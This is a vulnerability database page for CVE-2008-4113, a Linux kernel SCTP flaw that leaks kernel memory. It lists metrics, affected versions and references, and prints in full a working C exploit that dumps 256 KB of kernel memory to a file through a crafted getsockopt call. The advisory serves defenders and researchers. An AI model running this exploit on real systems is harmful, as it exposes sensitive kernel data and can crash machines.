CVE-2008-4113 : Detail

CVE-2008-4113

A01-Broken Access Control
0.04%V3
Local
2008-09-16 21:00 +00:00
2018-10-11 17:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an untrusted length value to limit copying of data from kernel memory, which allows local users to obtain sensitive information via a crafted SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metric Score Severity CVSS Vector Source
V2 4.7 AV:L/AC:M/Au:N/C:C/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 7618

Publication date : 2008-12-28 23:00 +00:00
Author : Jon Oberheide
EDB Verified : Yes

/* * cve-2008-4113.c * * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure * Jon Oberheide * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 * * The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream * Control Transmission Protocol (sctp) implementation in the Linux kernel * before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an * untrusted length value to limit copying of data from kernel memory, which * allows local users to obtain sensitive information via a crafted * SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function. * * Notes: * * If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an * unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory * out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will * trigger a kernel OOPS. */ #include #include #include #include #include #include #include #ifndef SCTP_HMAC_IDENT #define SCTP_HMAC_IDENT 22 #endif #define DUMP_SIZE 256*1024 #define DUMP_FILE "mem.dump" int main(int argc, char **argv) { int ret, sock; FILE *dumpfile; char *memdump, *err; socklen_t memlen = DUMP_SIZE; memdump = malloc(DUMP_SIZE); if (!memdump) { err = "malloc(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } memset(memdump, 0, DUMP_SIZE); printf("[+] creating IPPROTO_SCTP socket\n"); sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); if (sock == -1) { err = "socket(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen); ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen); if (ret == -1) { err = "getsockopt(2) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE); dumpfile = fopen(DUMP_FILE, "wb"); if (!dumpfile) { err = "fopen(3) failed"; printf("[-] Error: %s (%s)\n", err, strerror(errno)); return 1; } fwrite(memdump, 1, memlen, dumpfile); fclose(dumpfile); printf("[+] done.\n"); return 0; } // milw0rm.com [2008-12-29]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.25.14

Linux>>Linux_kernel >> Version 2.2.27

Linux>>Linux_kernel >> Version 2.4.36

Linux>>Linux_kernel >> Version 2.4.36.1

Linux>>Linux_kernel >> Version 2.4.36.2

Linux>>Linux_kernel >> Version 2.4.36.3

Linux>>Linux_kernel >> Version 2.4.36.4

Linux>>Linux_kernel >> Version 2.4.36.5

Linux>>Linux_kernel >> Version 2.4.36.6

Linux>>Linux_kernel >> Version 2.6

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.18

Linux>>Linux_kernel >> Version 2.6.19.4

Linux>>Linux_kernel >> Version 2.6.19.5

Linux>>Linux_kernel >> Version 2.6.19.6

Linux>>Linux_kernel >> Version 2.6.19.7

Linux>>Linux_kernel >> Version 2.6.20.16

Linux>>Linux_kernel >> Version 2.6.20.17

Linux>>Linux_kernel >> Version 2.6.20.18

Linux>>Linux_kernel >> Version 2.6.20.19

Linux>>Linux_kernel >> Version 2.6.20.20

Linux>>Linux_kernel >> Version 2.6.20.21

Linux>>Linux_kernel >> Version 2.6.21.5

Linux>>Linux_kernel >> Version 2.6.21.6

Linux>>Linux_kernel >> Version 2.6.21.7

Linux>>Linux_kernel >> Version 2.6.22

Linux>>Linux_kernel >> Version 2.6.22.2

Linux>>Linux_kernel >> Version 2.6.22.8

Linux>>Linux_kernel >> Version 2.6.22.9

Linux>>Linux_kernel >> Version 2.6.22.10

Linux>>Linux_kernel >> Version 2.6.22.11

Linux>>Linux_kernel >> Version 2.6.22.12

Linux>>Linux_kernel >> Version 2.6.22.13

Linux>>Linux_kernel >> Version 2.6.22.14

Linux>>Linux_kernel >> Version 2.6.22.15

Linux>>Linux_kernel >> Version 2.6.22.17

Linux>>Linux_kernel >> Version 2.6.22.18

Linux>>Linux_kernel >> Version 2.6.22.19

Linux>>Linux_kernel >> Version 2.6.22.20

Linux>>Linux_kernel >> Version 2.6.22.21

Linux>>Linux_kernel >> Version 2.6.22.22

Linux>>Linux_kernel >> Version 2.6.22_rc1

    Linux>>Linux_kernel >> Version 2.6.22_rc7

      Linux>>Linux_kernel >> Version 2.6.23

      Linux>>Linux_kernel >> Version 2.6.23.8

      Linux>>Linux_kernel >> Version 2.6.23.9

      Linux>>Linux_kernel >> Version 2.6.23.10

      Linux>>Linux_kernel >> Version 2.6.23.11

      Linux>>Linux_kernel >> Version 2.6.23.12

      Linux>>Linux_kernel >> Version 2.6.23.13

      Linux>>Linux_kernel >> Version 2.6.23.15

      Linux>>Linux_kernel >> Version 2.6.23.16

      Linux>>Linux_kernel >> Version 2.6.23.17

      Linux>>Linux_kernel >> Version 2.6.23_rc1

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24.1

        Linux>>Linux_kernel >> Version 2.6.24.2

        Linux>>Linux_kernel >> Version 2.6.24.3

        Linux>>Linux_kernel >> Version 2.6.24.4

        Linux>>Linux_kernel >> Version 2.6.24.5

        Linux>>Linux_kernel >> Version 2.6.24.6

        Linux>>Linux_kernel >> Version 2.6.24.7

        Linux>>Linux_kernel >> Version 2.6.24_rc1

          Linux>>Linux_kernel >> Version 2.6.24_rc4

            Linux>>Linux_kernel >> Version 2.6.24_rc5

              Linux>>Linux_kernel >> Version 2.6.25

              Linux>>Linux_kernel >> Version 2.6.25

                Linux>>Linux_kernel >> Version 2.6.25.1

                Linux>>Linux_kernel >> Version 2.6.25.1

                  Linux>>Linux_kernel >> Version 2.6.25.2

                  Linux>>Linux_kernel >> Version 2.6.25.2

                    Linux>>Linux_kernel >> Version 2.6.25.3

                    Linux>>Linux_kernel >> Version 2.6.25.3

                      Linux>>Linux_kernel >> Version 2.6.25.4

                      Linux>>Linux_kernel >> Version 2.6.25.4

                        Linux>>Linux_kernel >> Version 2.6.25.5

                        Linux>>Linux_kernel >> Version 2.6.25.5

                          Linux>>Linux_kernel >> Version 2.6.25.6

                          Linux>>Linux_kernel >> Version 2.6.25.6

                            Linux>>Linux_kernel >> Version 2.6.25.7

                            Linux>>Linux_kernel >> Version 2.6.25.7

                              Linux>>Linux_kernel >> Version 2.6.25.8

                              Linux>>Linux_kernel >> Version 2.6.25.8

                                Linux>>Linux_kernel >> Version 2.6.25.9

                                Linux>>Linux_kernel >> Version 2.6.25.9

                                  Linux>>Linux_kernel >> Version 2.6.25.10

                                  Linux>>Linux_kernel >> Version 2.6.25.10

                                    Linux>>Linux_kernel >> Version 2.6.25.11

                                    Linux>>Linux_kernel >> Version 2.6.25.11

                                      Linux>>Linux_kernel >> Version 2.6.25.12

                                      Linux>>Linux_kernel >> Version 2.6.25.12

                                        Linux>>Linux_kernel >> Version 2.6.25.13

                                        Linux>>Linux_kernel >> Version 2.6.25.15

                                        References

                                        http://www.securitytracker.com/id?1021000
                                        Tags : vdb-entry, x_refsource_SECTRACK
                                        http://secunia.com/advisories/32190
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://securityreason.com/securityalert/4266
                                        Tags : third-party-advisory, x_refsource_SREASON
                                        http://www.debian.org/security/2008/dsa-1655
                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                        http://secunia.com/advisories/32393
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://www.exploit-db.com/exploits/7618
                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                        http://www.securityfocus.com/bid/31121
                                        Tags : vdb-entry, x_refsource_BID
                                        http://www.ubuntu.com/usn/usn-659-1
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://www.redhat.com/support/errata/RHSA-2008-0857.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://secunia.com/advisories/32315
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.openwall.com/lists/oss-security/2008/09/26/6
                                        Tags : mailing-list, x_refsource_MLIST
                                        Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.